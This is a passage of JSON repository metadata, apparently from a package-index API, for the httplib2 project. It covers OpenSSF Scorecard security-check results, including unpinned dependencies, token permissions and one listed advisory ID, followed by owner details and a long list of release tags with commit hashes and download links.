ng workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"htt